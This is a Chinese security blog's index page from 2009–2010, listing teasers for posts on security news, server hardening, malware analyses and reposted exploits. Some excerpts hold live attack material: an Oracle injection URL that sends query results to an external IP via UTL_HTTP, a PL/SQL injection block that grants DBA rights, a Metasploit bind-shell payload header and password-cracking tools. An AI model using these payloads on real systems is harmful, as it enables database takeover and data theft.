夜雨山庄

随笔

Akira — 2010-03-05 20:36

接手HNC并改版,在此留个记号....

阅读全文

新年学习计划

Akira — 2010-02-15 14:26

新的一年, 新的开始.
过完了农历新年,开始了新的生活.
在过去的几年里,自己越来越不满足自己掌握的技术了
再此拟定一个学习计划,希望能给自己带来一些方便, 随便在此做个记录.以备监督自己.

阅读全文

内核型Rootkit病毒应对策略

Akira — 2009-08-10 14:39

本文通过实例讲解如何应对Rootkit（内核型）蠕虫病毒，本文是以感染orans.sys蠕虫病毒的计算机为例，分步介绍如何检测病毒体文件并手工清除病毒。

阅读全文

跟踪Blackhat的举动

Akira — 2009-08-10 14:36

　　这文章没有主要不是针对入侵检测进行讨论，关于IDS，internet上有很多优秀的源程序供你选择，如果你对入侵检测感兴趣，我建议你使用如Network Flight Recorder 和snort程序来尝试。此文主要集中在智力收集信息上，特别是，怎样通过查看你的系统记录来获取攻击者操作信息，可能你对你能在自己的LOG记录上能发现多少信息感到很惊讶，但是，在我们讲述查看你记录前，我们首先必须讨论下加强你的系统LOG安全性，如果你不能信任你系统记录的完整性那这些记录将会一文不值，多数black-aht在进入系统之后第一件事情就是怎样更改记录文件，网上非常多类型的Rootkit工具可以清楚记录文件中他们的留下的踪迹(如cloak)，或者阻止所有系统的记录(如伪造过的syslogd)，因此，要想查看系统记录，你必须保护好你的记录文件。

阅读全文

黑帽大会研究员：思科IOS缺陷成为攻击目标

Akira — 2009-08-10 14:26

虽然没有利用网络路由器漏洞发起的大规模攻击，但是VoIP的配置和新的Web服务功能——有时是默认开启的——使设备越来越受到恶意黑客的欢迎。

阅读全文

MMS信息欺骗攻击将影响全球

Akira — 2009-08-10 14:24

在2009年的黑帽大会上年轻研究人员Zane Lackey和Luis Miras演示了对iPhone SMS的攻击。在这次演示中他们欺骗发送者并利用GSM运营商的网络的漏洞，在MMS信息回路绕过他们。

阅读全文

DNSSEC解决跨组织可信性和安全问题

Akira — 2009-08-10 14:20

网络安全研究员Dan Kaminsky有一年的时间来回忆他在域名服务器（DNS）上发现的缓存投毒漏洞的影响。Kaminsky在去年的黑帽大会简报揭示了这种技术，结果利用漏洞变得更简单了，并使攻击者可以把网络请求重新定向到恶意网站。在这段时间，Kaminsky已经成为了改善DNS安全性，最终信任互联网络的倡导者。可以采用的方法之一是使用DNSSEC（DNS安全扩展， DNS Security Extensions），在本质上是把PKI（公钥基础设施）增加到网站请求中。在这次采访中，Kaminsky谈到了采用DNSSEC可以给网络带来更大的安全性和可信性，并为新的安全产品和服务的开发提供了新的平台。

阅读全文

黑帽大会上Kaminsky揭露X.509证书严重漏洞

Akira — 2009-08-10 14:18

Kaminsky在黑帽大会上演示了公共密钥架构VeriSign中X.509加密，而且认证授权还在继续使用MD5和更糟的MD2错误的哈希运算。

阅读全文

打造Linux下超安全的LAMP服务器

Akira — 2009-08-10 14:12

本文全面细致的介绍了在Linux下加固apache+php+mysql的方法，通过仔细阅读本文,你可以快速掌握安全配置apache,php,和mysql的方方面面，还有chroot这个前沿而强悍的技术，依靠这些知识，完全可以让你的WWW服务器在层出不穷的SQL注射(SQL Injection)和CSS跨站脚本攻击(Cross Site Script)中屹立不倒。

阅读全文

通过Orabrute暴力破解oracle密码

Akira — 2009-07-11 10:14

1 标准的Oracle 密码可以由英文字母，数字，#，下划线(_)，美元字符($)构成，密码的最大长度为30 字符；Oracle 密码不能以"$"，"#"，"_"或任何数字开头；密码不能包含"SELECT"，"DELETE"，"CREATE"这类的Oracle/SQL 关键字。
2 Oracle 的弱算法加密机制：两个相同的用户名和密码在两台不同的Oracle 数据库机器中，将具有相同的
哈希值。这些哈希值存储在SYS.USER$表中。可以通过像DBA_USERS 这类的视图来访问。
3 Oracle 默认配置下，每个帐户如果有10 次的失败登录，此帐户将会被锁定。但是SYS 帐户在Oracle 数
据库中具有最高权限，能够做任何事情，包括启动/关闭Oracle 数据库。即使SYS 被锁定，也依然能够访问
数据库。

阅读全文

MySQL二次漏洞的简单防范

Akira — 2009-07-11 10:11

众所周知，数据库操作中对于一些特殊字符（例如单引号“'”、反斜线“\”等元字符）有着严格的限制，如果向数据库中写入的数据含有这样的特殊字符，操作将会带来不安全因素。所以对于用户输入的数据，我们完全认为它是没有安全性的，需要在程序中对其进行适当的过滤处理后，方可写入数据库。

阅读全文

MSSQL数据库被插入木马批量删除sql语句

Akira — 2009-07-11 10:10

MSSQL数据库被插入木马批量删除sql语句
MSSQL数据库被插入木马批量删除sql语句，一朋友服务器被批量插入了js木马，几乎每个表的文本字段都被插入了，网上找了这个sql语句，留着备用。

阅读全文

命令行下建立VPN

Akira — 2009-07-11 10:03

.前提
服务里 windows防火墙停止（或者麻烦点可以把router协议，端口1723配进去）
远程注册表服务必须开启
server服务必须开启
router路由服务必须开启

阅读全文

Oracle+nc注射

Akira — 2009-07-11 10:01

url语句简单如下所示：

http://localhost/Kindle?jsp=1 and UTL_HTTP.request('外网ip:port/'||(sql语句))=1--

内容如下：

阅读全文

FreeBSD 7.0/7.1 vfs.usermount Local Privilege Escalation Exploit

Akira — 2009-07-11 09:53

* cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com
*
* Privilege escalation exploit for the FreeBSD-SA-08:08.nmount
* (CVE-2008-3531) vulnerability:

阅读全文

Windows Live Messenger Plus! FileServer 1.0 Directory Traversal Vuln

Akira — 2009-07-11 09:51

The FileServer script allows a user using Windows Live Messenger Plus! to share a defined folder and its subfolders and files with a contact.
Authentication is done using a user-defined username and password.
I have found a vulnerability in this script, which allows for downloading of EVERY file on the same disk as the defined folder ("root folder"),
even outside the root folder. The script can be found at http://www.msgpluslive.nl/scripts/view/65-FileServer/

阅读全文

WordPress Privileges Unchecked in admin.php and Multiple Information

Akira — 2009-07-11 09:49

WordPress is a web application written in PHP that allows the easy
installation of a flexible weblog on any computer connected to the
Internet. WordPress 2.7 reached more than 6 million downloads during
June 2009 [9].

A vulnerability was found in the way that WordPress handles some URL
requests. This results in unprivileged users viewing the content of
plugins configuration pages, and also in some plugins modifying plugin
options and injecting JavaScript code. Arbitrary native code may be run
by a malicious attacker if the blog administrator runs injected
JavasScript code that edits blog PHP code. Many WordPress-powered blogs,
hosted outside 'wordpress.com', allow any person to create unprivileged
users called subscribers. Other sensitive username information
disclosures were found in WordPress.

阅读全文

MS Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit

Akira — 2009-07-11 09:46

MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890)
Written by SecureState R&D Team
Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin
http://www.securestate.com
win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind

阅读全文

Sun One WebServer 6.1 JSP Source Viewing vulnerability

Akira — 2009-07-11 09:44

System: Sun-ONE-Web-Server/6.1, Windows Server 2003

SunOne WebServer (formerly Netscape Enterprise Server, iPlanet) on Windows Systems lets remote people disclose
JSP Source code.

阅读全文

xscreensaver 5.01 Arbitrary File Disclosure Symlink Attack Vulnerability

Akira — 2009-07-11 09:43

The �xscreensaver� program distributed normally with Xorg can be abused
to disclose local files owned by other users (also of the root account).
Xscreensaver has the setuid bit on by default (Example: Opensolaris)
The xscreensaver program uses the file ~/.xscreensaver to read configuration
options from. If this file is a symlink to another file then this file is parsed
and output is shown on the display. It has to be noted that during the parsing
of the file it may be possible that not the full file contents will be shown.

阅读全文

Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit

Akira — 2009-07-04 14:14

DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
end;

阅读全文

Apple Safari 4.x JavaScript Reload Remote Crash Exploit

Akira — 2009-07-04 14:11

Author   : Marcell 'SkyOut' Dietl, Achim Hoffmann
Email    : mail [at] marcell-dietl [dot] de
Vendor   : http://www.apple.com/
Product : http://www.apple.com/safari/
Found    : 12.06.2009
Released : 01.07.2009

Tested on:
- Safari 4.0 at Windows XP SP3
- Safari 4.0.1 at Mac OS X 10.5.7

阅读全文

“网络删帖”公司横空出世删除帖子有明码标价

Akira — 2009-07-04 08:16

“删除百度快照、删除负面新闻、删除负面信息请找专业团队。”这是沈阳一个网名为“番茄”的网络删帖手在互联网上打出的广告语。

近日，“网络删帖”公司这一新名词的横空出世引发了很大的争议。事实上，在当前互联网上有无数的“番茄”存在着，他们的背后很多甚至是专业的“网络删帖”公司。

阅读全文

网卡MAC地址获取远程

Akira — 2009-07-03 10:38

在实际的应用系统中，我们往往会需要在程序运行时获取当前机器的网卡的MAC地址，以便作为某种标识之用，如控制程序的合法性等。下文就如何用Microsoft Visual C++ 6.0开发这样的程序演示如何实现其要点。
---- 这里采用的方法是通过Windows 9x/NT/Win2000中内置的NetApi32.DLL的功能来实现的，首先通过发送NCBENUM命令获取网卡的数目和每个网卡的内部编号，然后对每个网卡标号发送NCBASTAT命令获取其MAC地址。注意：这里的网卡是指捆绑了NetBeui协议的通信协议栈，可以在网卡的属性处查看到。
--- 请运行VC++，打开一个新的工程，选择创建一个Win32 Console程序，然后按下文输入代码，并请参见其中的注释：

阅读全文

一个SQL Server Sa密码破解的存储过程

Akira — 2009-07-03 10:34

/*--穷举法破解 SQL Server 用户密码
可以破解中文,特殊字符,字符+尾随空格的密码
为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII
理论上可以破解任意位数的密码
条件是你的电脑配置足够,时间足够

阅读全文

Orcale TNS listener support for nmap

Akira — 2009-07-03 10:31

Orcale TNS listener support for nmap
so upgraded to latest version of nmap and it will now give you TNS listener versions. I couldnt find the exact build where this started but its certainly handy.

阅读全文

论外挂与反外挂

Akira — 2009-07-03 10:30

自<<石器时代>>开始, 外挂这一名词渐渐为世人所知. 到盛大第一款网游<<传奇>> 刚开始的宣传语 <永无外挂>
基本上所有的玩家都知道了有个叫外挂的玩意. 等到了<>基本上玩游戏的都是人手一挂.
但是当时的运营商并没有怎么把反外挂放在心上-当时游戏的模式只是点卡与月卡. 只要你玩游戏,总是要付费的.
运营商需要担心的,只是外挂会造成多少用户流失而已. <<石器>>的运营商很绝--干脆自己卖外挂.
而 <<传奇>>,<>则谣传与外挂分成. 这段时间乃是外挂的黄金期.
但是从某外挂的作者被判刑后外挂似乎一下子收敛了很多. 但是实际的情况呢?

阅读全文

如何利用漏洞评估管理无线网风险

Akira — 2009-07-02 08:43

　　保障无线局域网有很多种方法，但是，到底哪种方法更适合于用户所在的局域网，局域网是否能够完全有效地应对802.11和802.1x攻击，这些都需要根据无线局域网自身的情况，采取不同的方法。无线局域网应用逐渐变得流行起来，但无线局域网的安全问题，却一直是制约行业发展的因素之一，也是业内人士争论的焦点。本文将会为你介绍无线局域网漏洞以及如何消除这些潜在的威胁因素，还会为你阐述如何评估无线局域网漏洞并管理其风险。

阅读全文

斩断那只伸向Wi-Fi的黑手

Akira — 2009-07-02 08:39

　　当你商务旅行之时，或许会在某个咖啡馆小憩。可是在你一边从无线热点上网冲浪、一边品味饮料或美食的同时，别人说不定就在偷偷窃取你的个人信息。因为无线信号采用无线形式，人们实际上能够从空中窃取你的数据。

阅读全文

从漏洞补丁到入侵防护系统IPS

Akira — 2009-07-02 08:36

　　大部分普通电脑用户最关心哪家公司的漏洞补丁？答案一定是微软了。由于微软的补丁量很大，为此他们指定了一个周二补丁日，也就是所谓的 “Patch Tuesday”来统一发放补丁。之所以选择星期二，是为了避开繁忙的星期一。当然，非常紧急的补丁还是可以随时发布的。那这些补丁的作用是什么呢?当然是修补哪些0day了。

阅读全文

Backdoor/Win32.Hupigon.gpnl分析

Akira — 2009-07-02 08:27

病毒名称： Backdoor/Win32.Hupigon.gpnl
病毒类型：后门
文件 MD5： 8FA2CB59ACCE93489659C21926FC3097
公开范围：完全公开
危害等级： 4
文件长度： 24,064 字节
感染系统： Windows98以上版本
开发工具： Microsoft Visual C++ 6.0

阅读全文

Trojan/Win32.Mudrop.aui[Dropper]分析

Akira — 2009-07-02 08:26

病毒名称： Trojan/Win32.Mudrop.aui[Trojan/Win32.Mudrop.aui[Dropper]分析]
病毒类型：木马
文件 MD5： 6CF94B87CBEABFA0CEC421F3E4827823
公开范围：完全公开
危害等级： 4
文件长度： 13,840 字节
感染系统： Windows98以上版本
开发工具： Microsoft Visual C++ 6.0
加壳类型： NsPacK V3.7

阅读全文

Green Dam Remote Change System Time Exploit

Akira — 2009-07-02 08:22

// Green Dam listen on udp port 1234 and wait for the 4 bytes time value
// We can send some bytes to change the time of the dest system
// testgreendam[at]gmail.com

阅读全文

Metasploit使用教程

Akira — 2009-07-02 07:51

这个工具包分Linux/Unix版的和Windows版，考虑到大多数人都是使用的Windows系统，这里我把Windows版的Metasploit使用方法说明一下，至于Linux/Unix下的使用方法和Windows下的也是大同小异，这里就不额外的说明了。

下载回Metasploit的安装程序之后双击安装，傻瓜化的安装过程，这里就不多说了。安装完成后可以看到安装目录下多了很多文件，主要的是：Msfconsole.bat和Msfweb.bat。第一个是这个工具包的控制台，第二个是这个程序的图形界面下的程序，下面我将和大家一起来领略它们的魅力！。

命令行下使用Metasploit

运行后首先看到的是Metasploit欢迎界面，我们输入“？”

阅读全文

一成半网民曾访问钓鱼网站专家三招防骗

Akira — 2009-06-30 20:00

监测数据显示目前有10%-15%的中国网民在使用浏览器、即时通讯、游戏等软件时，曾访问钓鱼网站，接触过欺诈信息。

阅读全文

赛门铁克安全公告：迈克尔.杰克逊去世引发新一轮垃圾邮件狂潮

Akira — 2009-06-30 19:55

赛门铁克近日监测到假冒CNN报道杰克逊去世新闻的垃圾邮件，并发现其中包含了恶意链接。如果用户出于好奇心点击该链接，便被重新定向到一个恶意网页。

阅读全文

Php168 本地文件包含漏洞

Akira — 2009-06-25 15:33

影响版本:
v6版
漏洞描述:
在do/job.php文件:

...
}elseif(ereg("^([-_0-9a-zA-Z]+)$",$_GET[job])||ereg("^([-_0-9a-zA-Z]+)$",$_POST[job])){
    require(dirname(__FILE__)."/"."global.php");
    if(is_file(PHP168_PATH."inc/job/$job.php")){
        include(PHP168_PATH."inc/job/$job.php");
    }
}

阅读全文

MyBB <= 1.4.6 Remote Code Execution Exploit

Akira — 2009-06-23 11:36

Someone decided to contact mybb's staff informing about this vulnerability with the obvious result that this will not work anymore.
Fucking moron.

I'm releasing a non-finished version of the exploit. No help, PoC and with the necessity of --admindir flag.
Going to update it in the next days.
For historical reason, i'm leaving the original title, but note that is <= 1.4.6

阅读全文

DESlock+ 4.0.2 dlpcrypt.sys Local Kernel ring0 Code Execution Exploit

Akira — 2009-06-19 17:33

/* deslock-dlpcrypt.c
*
* Copyright (c) 2009 by
*
* DESlock+ 4.0.2 local kernel SYSTEM exploit
* by mu-b - Thu 18 Jun 2009
*
* - Tested on: dlpcrypt.sys 0.1.1.27
*
* .text:0001BB2E: 'what do ya want for nothing?'
* - hmmm, something that doesn't pass kernel mode pointers
* between kernel and userland?
*
* Compile: MinGW + -lntdll
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2009!@$!

阅读全文

WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability

Akira — 2009-06-18 20:44

ordpress Photoracer Plugin => SQL injection
http://wordpress.org/extend/plugins/photoracer/

Author: Kacper
Website: http://devilteam.pl/

Pozdrawiam wszystkich z huba dc++, oraz wszystkich z forum,

Pozdro: Ratman, Kopaczka, FDJ

阅读全文

存储过程的注入

Akira — 2009-06-18 20:42

　由于存储过程中存在用于字符串连接的 + 号连接SQL语句,这就造成SQL注入的可能性

阅读全文

关于163XSS漏洞

Akira — 2009-06-18 20:39

163 filter 08年底升级后,有不少改进.但还是明显落后于其它webmail.比如,除掉

夜雨山庄

随笔

新年学习计划

内核型Rootkit病毒应对策略

跟踪Blackhat的举动

黑帽大会研究员：思科IOS缺陷成为攻击目标

MMS信息欺骗攻击将影响全球

DNSSEC解决跨组织可信性和安全问题

黑帽大会上Kaminsky揭露X.509证书严重漏洞

打造Linux下超安全的LAMP服务器

通过Orabrute暴力破解oracle密码

MySQL二次漏洞的简单防范

MSSQL数据库被插入木马批量删除sql语句

命令行下建立VPN

Oracle+nc注射

FreeBSD 7.0/7.1 vfs.usermount Local Privilege Escalation Exploit

Windows Live Messenger Plus! FileServer 1.0 Directory Traversal Vuln

WordPress Privileges Unchecked in admin.php and Multiple Information

MS Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit

Sun One WebServer 6.1 JSP Source Viewing vulnerability

xscreensaver 5.01 Arbitrary File Disclosure Symlink Attack Vulnerability

Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit

Apple Safari 4.x JavaScript Reload Remote Crash Exploit

“网络删帖”公司横空出世删除帖子有明码标价

网卡MAC地址获取远程

一个SQL Server Sa密码破解的存储过程

Orcale TNS listener support for nmap

论外挂与反外挂

如何利用漏洞评估管理无线网风险

斩断那只伸向Wi-Fi的黑手

从漏洞补丁到入侵防护系统IPS

Backdoor/Win32.Hupigon.gpnl分析

Trojan/Win32.Mudrop.aui[Dropper]分析

Green Dam Remote Change System Time Exploit

Metasploit使用教程

一成半网民曾访问钓鱼网站 专家三招防骗

赛门铁克安全公告：迈克尔.杰克逊去世引发新一轮垃圾邮件狂潮

Php168 本地文件包含漏洞

MyBB <= 1.4.6 Remote Code Execution Exploit

DESlock+ 4.0.2 dlpcrypt.sys Local Kernel ring0 Code Execution Exploit

WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability

存储过程的注入

关于163XSS漏洞

一成半网民曾访问钓鱼网站专家三招防骗